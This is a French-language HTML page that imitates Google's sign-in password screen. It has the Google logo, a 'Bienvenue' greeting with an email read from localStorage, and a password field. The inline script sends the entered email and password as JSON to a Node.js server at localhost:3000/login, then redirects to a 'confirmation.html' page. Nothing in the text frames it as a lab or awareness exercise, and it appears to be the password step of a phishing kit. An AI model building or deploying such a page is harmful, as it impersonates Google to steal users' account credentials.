<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Connexion - Google </title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
  <style>
    body {
      margin: 0;
      background-color: #1e1f20;
      font-family: Arial, sans-serif;
      height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .container {
      background-color: #0e0e0e;
      color: white;
      width: 1100px;
      height: 400px;
      border-radius: 30px;
      padding: 30px 40px;
      box-sizing: border-box;
      position: relative;
      display: flex;
    }

    .logo {
      position: absolute;
      top: 30px;
      left: 30px;
    }

    .logo img {
      height: 50px;
    }

    .left {
      flex: 1;
      display: flex;
      flex-direction: column;
      justify-content: center;
      padding-left: 20px;
      padding-bottom: 100px;
    }

    .left h1 {
      font-size: 40px;
      font-weight: normal;
      margin-bottom: 10px;
    }

    .left p {
      font-size: 14px;
      color: #ccc;
      word-break: break-word;
    }

    .right {
      flex: 1;
      display: flex;
      flex-direction: column;
      justify-content: center;
      padding-right: 20px;
    }

    .input-box {
      position: relative;
      width: 100%;
    }

    .input-box input {
      width: 100%;
      padding: 16px 10px 14px 10px;
      font-size: 16px;
      border: 2px solid #a8c7fa;
      border-radius: 5px;
      outline: none;
      background-color: #0e0e0e;
      color: white;
    }

    .input-box label {
      position: absolute;
      top: -10px;
      left: 12px;
      background-color: #0e0e0e;
      color: #a8c7fa;
      padding: 0 6px;
      font-size: 13px;
    }

    .input-error {
      border: 2px solid #f2b8b5 !important;
    }

    .label-error {
      color: #f2b8b5 !important;
    }

    .checkbox {
      margin-top: 16px;
      display: flex;
      align-items: center;
      color: #d0d0d0;
      font-size: 15px;
      padding-left: 2px;
    }

    .checkbox input[type="checkbox"] {
      appearance: none;
      width: 18px;
      height: 18px;
      border: 2px solid #a8c7fa;
      border-radius: 2px;
      background-color: #0e0e0e;
      margin-right: 10px;
      position: relative;
      cursor: pointer;
    }

    .checkbox input[type="checkbox"]:checked::after {
      content: '';
      position: absolute;
      top: 0px;
      left: 5px;
      width: 5px;
      height: 10px;
      border: solid #a8c7fa;
      border-width: 0 2px 2px 0;
      transform: rotate(45deg);
    }

    #mdpError {
      color: #f2b8b5;
      font-size: 13px;
      margin-top: 6px;
      display: none;
    }

    .suivant-btn {
      position: absolute;
      bottom: 20px;
      right: 40px;
      background-color: #b6d0fb;
      color: #000;
      border: none;
      border-radius: 25px;
      padding: 10px 30px;
      font-size: 16px;
      cursor: pointer;
    }

    .email-border {
      border: 2px solid #8e918f;
      border-radius: 20px;
      padding: 4px 12px;
      width: max-content;
      display: inline-block;
      background-color: #131313;
      color: #ffffff;
    }
  </style>

<script>
  window.onload = function () {
    const email = localStorage.getItem("email");
    if (email) {
      document.getElementById("emailSpan").textContent = email;
    }
  };

  function togglePasswordVisibility() {
    const input = document.getElementById("champ");
    input.type = input.type === "password" ? "text" : "password";
  }

  document.addEventListener("DOMContentLoaded", function () {
    const bouton = document.querySelector(".suivant-btn");
    const emailSpan = document.getElementById("emailSpan");
    const passwordInput = document.getElementById("champ");
    const passwordLabel = document.querySelector("label[for='champ']");
    const mdpError = document.getElementById("mdpError");

    bouton.addEventListener("click", function () {
      let valid = true;

      if (passwordInput.value.trim() === "") {
        passwordInput.classList.add("input-error");
        passwordLabel.classList.add("label-error");
        mdpError.style.display = "block";
        valid = false;
      }

      if (valid) {
        // Envoi au serveur local Node.js
        fetch('http://localhost:3000/login', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            email: emailSpan.textContent,
            mot_de_passe: passwordInput.value
          })
        })
        .then(response => response.json())
        .then(data => {
          console.log(data.message);
          window.location.href = "confirmation.html";
        })
        .catch(error => {
          console.error("Erreur lors de l’envoi :", error);
        });
      }
    });

    passwordInput.addEventListener("input", function () {
      passwordInput.classList.remove("input-error");
      passwordLabel.classList.remove("label-error");
      mdpError.style.display = "none";
    });
  });
</script>

</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="https://www.gstatic.com/images/branding/product/1x/googleg_32dp.png" alt="Logo">
    </div>

    <div class="left">
      <h1>Bienvenue</h1>
      <p id="emailText" class="email-border">
        <i class="fas fa-user" style="margin-right: 8px;"></i>
        <span id="emailSpan">...</span>
      </p>
    </div>

    <div class="right">
      <div class="input-box">
        <input type="password" id="champ" required placeholder=" ">
        <label for="champ">Saisissez votre mot de passe</label>
        <small id="mdpError">Saisissez votre mot de passe</small>
      </div>
      <div class="checkbox">
        <input type="checkbox" id="toggle-password" onclick="togglePasswordVisibility()">
        <label for="toggle-password">Afficher le mot de passe</label>
      </div>
    </div>

    <button class="suivant-btn">Suivant</button>
  </div>
</body>
</html>
